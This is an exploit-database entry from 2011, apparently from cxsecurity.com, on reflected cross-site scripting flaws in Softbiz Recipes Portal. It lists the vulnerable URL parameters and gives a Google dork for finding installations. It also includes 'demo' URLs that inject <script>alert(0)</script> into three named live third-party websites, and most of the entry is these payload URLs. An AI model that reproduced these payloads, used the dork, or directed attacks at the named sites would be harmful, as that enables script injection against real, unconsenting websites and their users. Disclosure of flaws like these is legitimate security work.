Softbiz Recipes Portal Cross Site Scripting

2011.08.06
Credit: Net.Edit0r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################ In The Name Of God Iran ############### ######################################## # Exploit Title:Softbiz Recipes Portal Multiple XSS Vulnerabilities # Author: Net.Edit0r # Date : 2011-08-05 # home Page: http://Black-HG.Org ~ http://h4ckcity.Org # Location : Iran # Vendor or Software Link: http://www.softbizscripts.com/ # Contact : Black.hat.tm@Gmail.Com & Net.Edit0r@att.net # Version: N/A # Category:: webapps # Google dork: "Powered by SoftbizScripts" # Tested on: ubuntu 11.04 ~ Linux Back Track 5 #################################################################### # Proof Of Concept [POC] http://site/[path]/admin/index.php?msg=[XSS] http://site/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS] http://site/[path]/signinform.php?errmsg=[XSS] http://site/[path]/msg_confirm_mem.php?errmsg=[XSS] # Demo [POC] http://classifieds-market.net/signinform.php?errmsg="><script>alert(0)</script> http://www.buy-sellcars.com/msg_confirm_mem.php?errmsg="><script>alert(0)</script> http://www.micaregivers.org/caregivers/admin/index.php?msg="><script>alert(0)</script> ######################################################################################### #Greetz To: DarkCoder , Dr.Niloo , Amir-MaGiC , H3x , Cyrus , D3adlY , 3H34N Spical Th4nks: B3hz4d | Cru3l.b0y | M4Hd1 | Mikili | L0phtiran And All My Friendz [ Pentesters.Ir ] , packetstormsecurity.org, 1337day.com ,securityreason.com ########################################################################################## ########################### Persian Gulf 4 Ever ~ I Love Iran And All Iranian People ####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top